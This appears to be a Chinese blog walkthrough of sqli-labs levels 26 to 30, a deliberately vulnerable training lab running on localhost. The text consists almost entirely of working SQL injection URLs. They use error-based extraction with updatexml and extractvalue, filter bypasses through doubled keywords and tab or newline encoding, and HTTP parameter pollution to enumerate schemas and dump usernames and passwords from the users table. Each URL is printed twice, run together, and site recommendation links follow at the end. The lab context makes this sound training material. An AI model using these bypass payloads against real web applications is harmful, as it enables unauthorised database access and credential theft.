sqli-labsSQL手工注入第26-30关

第26关

一.查询数据库

http://127.0.0.1/Less-26/?id=11%27%26extractvalue(1,concat(%27~%27,database(),%27~%27))%261=%27

二.查表

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=%27security%27))),1))||%27http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=%27security%27))),1))||%27

三.查列

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=%27security%27aandnd(table_name=%27users%27)))),1))||%27http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=%27security%27aandnd(table_name=%27users%27)))),1))||%27

四.查user表里信息

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(passwoorrd,username))from(users))),1))||%27http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(passwoorrd,username))from(users))),1))||%27

第27关

一.查询数据库

http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09database())),1)and%27http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09database())),1)and%27

二.查表

http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=%27security%27)),1)and%27http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=%27security%27)),1)and%27

三.查列

http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema=%27security%27%09and%09table_name=%27users%27)),1)and%27http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema=%27security%27%09and%09table_name=%27users%27)),1)and%27

四.查user表里信息

http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(username,password)%09from%09users)),1)and%27http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(username,password)%09from%09users)),1)and%27

第28关

一.查询数据库

http://127.0.0.1/Less-28/?id=88%27)uni%20union%0Aselecton%0Aselect%0A1,database(),2%0Aand%20(%271http://127.0.0.1/Less-28/?id=88%27)uni%20union%0Aselecton%0Aselect%0A1,database(),2%0Aand%20(%271

二.查表

http://127.0.0.1/Less-28/?id=88%27)uni%20union%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271http://127.0.0.1/Less-28/?id=88%27)uni%20union%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271

三.查列

http://127.0.0.1/Less-28/?id=88%27)uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271http://127.0.0.1/Less-28/?id=88%27)uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271

四.查询user表中信息

http://127.0.0.1/Less-28/?id=88%27)union%0Aunion%0Aselectselect%0A1,group_concat(username,password),3%0Afrom%0Ausers%0Awhere%0A1=1%0Aand(%271%27)=(%271http://127.0.0.1/Less-28/?id=88%27)union%0Aunion%0Aselectselect%0A1,group_concat(username,password),3%0Afrom%0Ausers%0Awhere%0A1=1%0Aand(%271%27)=(%271

第29关

一.查询数据库

http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,database(),3%20--+http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,database(),3%20--+

二.查表

http://127.0.0.1/Less-29/?id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+http://127.0.0.1/Less-29/?id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+

三.查列

http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+

四.查user表中信息

http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+

第30关

一.查询数据库

http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,database(),3%20--+http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,database(),3%20--+

二.查表

http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+

三.查列

http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+

四.查user表中信息

http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+

相关推荐
火龙谷1 小时前
【nosql】有哪些非关系型数据库?
数据库·nosql
焱焱枫2 小时前
Oracle获取执行计划之10046 技术详解
数据库·oracle
qq_392397124 小时前
Redis常用操作
数据库·redis·wpf
一只fish5 小时前
MySQL 8.0 OCP 1Z0-908 题目解析(17)
数据库·mysql
花好月圆春祺夏安6 小时前
基于odoo17的设计模式详解---装饰模式
数据库·python·设计模式
A__tao6 小时前
SQL 转 Java 实体类工具
java·数据库·sql
m0_653031366 小时前
腾讯云认证考试报名 - TDSQL数据库交付运维专家(TCCE PostgreSQL版)
运维·数据库·腾讯云
小马哥编程7 小时前
【iSAQB软件架构】架构决策记录-ADR
数据库·架构·系统架构·设计规范
萧鼎7 小时前
深度探索 Py2neo:用 Python 玩转图数据库 Neo4j
数据库·python·neo4j
m0_653031368 小时前
腾讯云认证考试报名 - TDSQL数据库交付运维专家(TCCE MySQL版)
运维·数据库·腾讯云